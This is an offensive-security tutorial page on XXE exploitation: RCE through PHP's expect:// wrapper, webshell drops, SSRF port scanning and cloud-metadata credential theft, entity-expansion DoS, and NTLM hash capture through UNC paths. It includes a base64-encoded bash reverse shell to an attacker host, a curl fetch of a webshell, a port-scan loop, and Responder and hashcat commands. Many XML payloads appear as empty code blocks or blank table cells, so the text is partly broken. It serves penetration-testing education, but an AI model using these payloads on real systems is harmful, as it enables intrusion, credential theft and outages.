# RCE and SSRF

> XXE primitives beyond file disclosure - PHP expect:// wrapper for direct command execution and webshell drop, internal port scanning via SSRF over external entities, the billion-laughs entity expansion DoS pattern (and why modern parsers prevent it), and Windows UNC path abuse for NTLM hash theft against attacker-controlled SMB shares.

## TL;DR

XXE isn't only about file reads. Four additional primitives are available, depending on parser and target:

```
# 1. PHP expect:// for direct RCE (requires expect module loaded - uncommon)
# 2. SSRF - make the parser fetch internal URLs
# 3. Billion laughs DoS (often blocked in modern parsers) (recursive expansion, 10^N total)
# 4. Windows UNC path → NTLM hash to attacker-controlled SMB
```

Success indicator depends on path: shell on the target (RCE), internal service response leaked back via reflection or OOB (SSRF), target's response slow/error/crash (DoS), or a Responder/SMB capture of the target's NTLM hashes.

## RCE via PHP expect://

The `expect://` wrapper is part of PHP's `pecl-expect` extension. When loaded, it executes commands on the host:

```xml
]>
&xxe;
```

If `expect` is loaded, the response includes the output of `id`:

```
Thanks uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

That's immediate RCE.

### The reality check

PHP `expect` is **not enabled by default** on any modern PHP install. It's a manually-installed PECL extension, and most distros don't include it in their default packages. In a real engagement, expect-enabled targets are rare - when you find one, it's usually a legacy app or a deliberately weakened lab environment.

Always test for it even though it's rare - the cost is one extra payload and the payoff is full RCE in a single shot.

### Detecting expect support

```xml
```

If the response contains the output of `id`, expect is loaded. If it returns empty, an error, or "wrapper not supported," it's not. Either way, move on.
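When the same check is repeated across many endpoints, the "does the response contain `id` output" decision can be scripted. The following is a minimal sketch, assuming the response body is already available as a string and the target is a Unix-like host; the function name `looks_like_id_output` and the regular expression are illustrative choices, not part of any tool.

```python
import re

# Typical shape of `id` output, e.g. "uid=33(www-data) gid=33(www-data)".
# Assumption: a Unix-like target where `id` prints uid= and gid= fields.
ID_OUTPUT = re.compile(r"uid=\d+(\([^)]*\))?\s+gid=\d+(\([^)]*\))?")


def looks_like_id_output(body: str) -> bool:
    """Return True if the body contains something shaped like `id` output."""
    return ID_OUTPUT.search(body) is not None
```

An empty body, a parser error, or a "wrapper not supported" message all return `False`, which matches the "not loaded, move on" branch.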
### Crafting expect commands

Two constraints on what you can pass to `expect://`:

1. **XML reserved characters**: `<`, `>`, `&`, `"`, `'` will break the XML if used in the command without entity-encoding. Avoid them.
2. **URL syntax**: characters with URL-special meaning (`?`, `#`, `&`, spaces) get parsed weirdly. Spaces in particular usually break the wrapper.

The standard workaround for spaces is `$IFS` (the shell's Internal Field Separator, which defaults to space/tab/newline):

```xml
```

Expands to: `curl -O 'http://attacker:8000/shell.php'`

For more complex commands, base64-encode and pipe to `bash`:

```shell
$ echo 'bash -c "/bin/bash -i >& /dev/tcp/attacker/4444 0>&1"' | base64
YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2F0dGFja2VyLzQ0NDQgMD4mMSIK
```

```xml
```

Pipes (`|`) often survive in expect:// URLs but test first - some parsers URL-decode and break on `|`.

### Webshell drop pattern

The cleanest single-shot RCE-to-shell pattern:

```shell
# On attacker host
$ echo '' > shell.php
$ python3 -m http.server 8000
```

```xml
]>
&xxe;
```

The target uses curl to download your shell.php into its own webroot. Now you have a persistent webshell:

```shell
$ curl 'http://target/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Trade-off: dropping a file is louder than one-shot RCE - but persistent shell is worth the noise in most engagements.

### What if expect isn't loaded

When `expect://` isn't available, RCE through XXE alone usually isn't possible. The pivots:

- **Use file disclosure to find credentials** (see [File disclosure](/codex/web/xxe/file-disclosure/)) - DB passwords in config files, SSH keys, AWS keys
- **Use SSRF to reach internal services** (next section) - internal admin panels, unauthenticated metadata services, internal API endpoints
- **Chain with another vulnerability** - an upload, an SSTI in a different field, an admin-only function via IDOR

XXE without expect is "file read + SSRF + maybe DoS."
That's still highly impactful.

## SSRF via XXE

External entity URIs aren't limited to `file://`. The parser will resolve `http://` and `https://` URIs too, which makes XXE a vehicle for Server-Side Request Forgery - making the target's parser fetch URLs from the target's network perspective.

### Basic internal probe

```xml
]>
&xxe;
```

If the target has an admin panel on localhost:8080 not exposed externally, this fetches its homepage. The HTML response gets reflected back through whichever field echoes the entity value. For non-reflected variants, use the OOB pattern from [Blind exfil](/codex/web/xxe/blind-exfil/) - your listener receives the internal response.

### Internal port scanning

Loop XXE payloads over a port range and observe response differences:

```shell
$ for port in 22 80 443 3306 5432 6379 8080 8443 9000 11211; do
    response=$(curl -s -X POST http://target/api/submit \
      -H 'Content-Type: application/xml' \
      --data " ]> &xxe;")
    size=$(echo -n "$response" | wc -c)
    echo "Port $port: $size bytes"
  done
```

Patterns to look for:

| Response | Likely state |
| --- | --- |
| Reasonable HTML/JSON content | Port open, service responded |
| Empty / very small response | Port open but service didn't respond as HTTP (e.g., SSH banner) |
| Connection refused error | Port closed |
| Timeout | Port filtered (firewall) |

Note that timing varies per parser. Some parsers wait 30+ seconds on connection timeouts - set per-request timeouts in your scanner accordingly.
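The response table can be expressed as a small classifier so that scan output is labelled consistently. This is a minimal sketch, assuming the caller has already collected the response body, any error text, and whether the request timed out; `classify_probe` and the 64-byte "very small" threshold are illustrative assumptions and should be tuned per target.

```python
from typing import Optional

# Assumed cut-off for "empty / very small response"; tune per target.
SMALL_BODY_BYTES = 64


def classify_probe(body: str, error: Optional[str] = None,
                   timed_out: bool = False) -> str:
    """Map one probe result onto the likely port state from the table."""
    if timed_out:
        return "filtered"
    # Parser errors are sometimes reflected in the body, so check both places.
    text = f"{error or ''} {body}".lower()
    if "connection refused" in text:
        return "closed"
    if len(body.encode()) <= SMALL_BODY_BYTES:
        return "open (non-HTTP or silent service)"
    return "open (service responded)"
```

Checking the timeout first matters because a timed-out request usually also has an empty body, which would otherwise be mislabelled as an open non-HTTP port.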
### Reaching cloud metadata services

The classic high-value internal target on cloud hosts:

| Cloud | Metadata URL |
| --- | --- |
| AWS | `http://169.254.169.254/latest/meta-data/` |
| AWS (IMDSv2 - requires PUT) | Token-based; harder to use XXE for |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` (needs `Metadata-Flavor: Google` header) |
| Azure | `http://169.254.169.254/metadata/instance` (needs `Metadata: true` header) |
| Oracle Cloud | `http://192.0.0.192/latest/` |

```xml
```

If the instance has an IAM role attached, this returns the role name. Follow up with:

```xml
```

Returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken). Use with `aws-cli` to operate as the instance's IAM role.

GCP and Azure require headers, which XXE alone can't add - XML entity URLs don't carry headers. For metadata services that require headers, XXE can confirm reachability but not actually retrieve credentials.

### Reaching internal admin panels

Beyond cloud metadata, internal admin panels are common XXE-SSRF targets:

| Service | Default port | Sometimes accessible |
| --- | --- | --- |
| Jenkins | 8080 | `http://127.0.0.1:8080/script` (Groovy console - direct RCE) |
| Tomcat manager | 8080 | `http://127.0.0.1:8080/manager/html` |
| Elasticsearch | 9200 | `http://127.0.0.1:9200/_cluster/health` |
| MongoDB REST | 28017 | `http://127.0.0.1:28017/` |
| Redis | 6379 | Not HTTP, but some Redis configs respond to HTTP-shaped queries |
| etcd | 2379 | `http://127.0.0.1:2379/v2/keys/` |
| Consul | 8500 | `http://127.0.0.1:8500/v1/agent/self` |
| Kubernetes API | 6443 | `https://127.0.0.1:6443/api/v1/namespaces` (usually requires auth) |

Each is worth a probe - the value of finding one is high (often direct admin access on the internal service).
### SSRF protocol scope

The protocols a parser supports vary:

| Protocol | libxml2 (PHP) | Java SAX | .NET XmlReader |
| --- | --- | --- | --- |
| `file://` | Yes | Yes | Yes |
| `http://`, `https://` | Yes | Yes | Yes |
| `ftp://` | Yes | Sometimes | No |
| `gopher://` | No | Sometimes | No |
| `expect://` | If module loaded | No | No |
| `jar:` | No | **Yes** | No |
| `netdoc:` | No | Yes | No |

Java's `jar:` protocol is particularly interesting - it wraps another URL, fetches a JAR over HTTP, and extracts a specific file from inside. Sometimes useful for blind exfil because the response timing differs from a raw HTTP fetch.

## Billion-laughs DoS

The historical denial-of-service payload:

```xml
]>
&a10;
```

`a10` resolves to 10 copies of `a9`, each of which is 10 copies of `a8`, ... down to `a0` which is the literal `"DOS"`. Total expansion: 10¹⁰ copies of a 3-character string, about 3 × 10¹⁰ characters, or roughly 30 GB of memory. The parser tries to materialize the string, runs out of memory, and crashes.

### Why this rarely works in 2024

Every major XML parser shipped between 2012 and 2018 added protection:

- **libxml2** (PHP, Python `lxml`, others): enforces a hard limit on entity expansion (10MB default since 2.9.0; the `XML_PARSE_HUGE` parser option lifts it)
- **Java**: the `jdk.xml.entityExpansionLimit` system property; defaults to 64,000 expansions
- **.NET**: `XmlReaderSettings.DtdProcessing` defaults to `Prohibit`, so DTDs are rejected outright; `XmlReaderSettings.MaxCharactersFromEntities` caps expansion when DTD processing is enabled

Modern targets reject the payload outright with "entity expansion limit exceeded" or just refuse to expand past the budget. Try it once on every XXE-vulnerable target to check, but expect failure.

### Quadratic blowup - the actually-still-works variant

A different DoS payload bypasses entity expansion limits by using a single entity many times:

```xml
]>
&a;&a;&a;&a;&a;&a;&a;...(repeated 10,000 times)...&a;&a;&a;
```

This isn't recursive - it's just 10,000 references to a 10,000-char entity, producing 100MB output. Entity-expansion limits don't catch it because there's no recursion.
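The sizes of both payloads follow from simple multiplication. The sketch below works through the arithmetic, assuming ten nested levels above `a0`, ten references per level, and a three-character base string for billion-laughs; the function names are illustrative.

```python
def billion_laughs_chars(levels: int, fanout: int, base: str) -> int:
    """Characters produced when each of `levels` nested entities
    references the previous one `fanout` times, ending in `base`."""
    return len(base) * fanout ** levels


def quadratic_blowup_chars(entity_chars: int, references: int) -> int:
    """Characters produced by referencing one flat entity many times."""
    return entity_chars * references


print(billion_laughs_chars(levels=10, fanout=10, base="DOS"))  # 30000000000 (~30 GB)
print(quadratic_blowup_chars(10_000, 10_000))                  # 100000000 (~100 MB)
```

The first grows exponentially with nesting depth, which is what expansion-depth limits target. The second grows only with document size, which is why it needs an output-size limit instead.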
Parsers with no output-size limit will materialize the full 100MB and slow down. Modern parsers added output-size limits to address this, but the protection is patchier than recursive-expansion protection. Worth trying on targets where billion-laughs fails.

## Windows UNC hash theft

When the target is a Windows host parsing XML with external entity support, UNC paths trigger SMB connections - and SMB connections leak NTLM hashes:

```xml
]>
&xxe;
```

The parser tries to open the file via SMB. To authenticate the SMB connection, Windows sends an NTLMv2 challenge-response derived from the target service account's password hash (loosely called "the NTLM hash") to the attacker-controlled SMB server.

### Capturing with Responder

On the attacker host:

```shell
$ sudo responder -I eth0
```

Responder listens for SMB authentication attempts and captures NTLMv2 hashes:

```
[SMB] NTLMv2-SSP Client   : 10.10.10.42
[SMB] NTLMv2-SSP Username : CORP\webapp_svc
[SMB] NTLMv2-SSP Hash     : webapp_svc::CORP:1122334455667788:...
```

Crack offline with hashcat:

```shell
$ hashcat -m 5600 ntlmv2.txt rockyou.txt
```

If the service account uses a guessable password, you get plaintext credentials for a domain-joined account - direct path to lateral movement.

### Prerequisites

This works when:

- The XML parser supports `\\...\` UNC paths (some do, some don't)
- The target's OS is Windows
- The target can reach the attacker's SMB port (445/TCP) outbound - many environments firewall this, but inside-out SMB is common in less-mature setups
- The XML parser runs as a domain-joined account (workstation/local accounts also work but with less downstream value)

Outbound SMB from web servers is heavily monitored / firewalled in mature environments. In permissive networks (lab, internal apps, smaller orgs), this still works.
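Before handing a captured line to hashcat mode 5600, it can help to confirm the line has the expected `user::domain:challenge:proof:blob` shape, since truncated captures fail silently. This is a minimal sketch under that format assumption; `parse_netntlmv2` and the `NetNTLMv2` tuple are hypothetical helpers, not part of Responder or hashcat.

```python
from typing import NamedTuple, Optional


class NetNTLMv2(NamedTuple):
    user: str
    domain: str
    server_challenge: str  # 8 bytes, hex
    nt_proof: str          # 16 bytes, hex
    blob: str              # variable-length hex


def parse_netntlmv2(line: str) -> Optional[NetNTLMv2]:
    """Return the parsed fields, or None if the line is malformed or truncated."""
    parts = line.strip().split(":")
    # Expected fields: user, empty, domain, challenge, proof, blob
    if len(parts) != 6 or parts[1] != "":
        return None
    user, _, domain, challenge, proof, blob = parts
    if len(challenge) != 16 or len(proof) != 32 or not blob:
        return None
    try:
        bytes.fromhex(challenge + proof + blob)  # all three must be valid hex
    except ValueError:
        return None
    return NetNTLMv2(user, domain, challenge, proof, blob)
```

A line that has been cut off after the challenge (as in abbreviated log output) returns `None`, so it can be filtered out before a cracking run.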
### Alternative: HTTP NTLM via UNC

If outbound SMB is blocked but HTTP isn't, some Windows components negotiate NTLM over HTTP for paths that look like web shares:

```xml
```

If the parser uses Windows URL-fetching APIs (which negotiate NTLM by default for non-Internet zones), it sends NTLM auth to your HTTP server. Capture with `ntlmrelayx` or a custom listener.

## Quick reference

| Primitive | Payload |
| --- | --- |
| RCE via expect (id check) | `` |
| RCE webshell drop | `` |
| SSRF localhost | `` |
| SSRF internal hostname | `` |
| SSRF AWS metadata | `` |
| Port scan loop | bash for-loop over ports + XXE per port |
| Billion-laughs DoS | Nested `` referencing `aN-1` 10 times each |
| Quadratic blowup DoS | One large entity, referenced 10000+ times in body |
| Windows UNC NTLM theft | `` |
| Capture NTLM | `sudo responder -I eth0` |
| `$IFS` for spaces in expect | `expect://curl$IFS-O$IFS'URL'` |
| Detect expect loaded | Send `expect://id`; if output appears, it's loaded |
| Cloud metadata services | AWS: 169.254.169.254; GCP: metadata.google.internal; Azure: 169.254.169.254 |

For tool-driven automation across the various XXE primitives (blind exfil, file read, port scan), see [Automation](/codex/web/xxe/automation/).